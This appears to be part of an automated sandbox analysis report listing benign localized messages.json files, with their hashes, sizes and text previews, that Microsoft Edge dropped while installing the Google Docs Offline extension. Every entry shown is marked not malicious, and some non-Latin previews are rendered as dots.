Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7404_2050405795\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
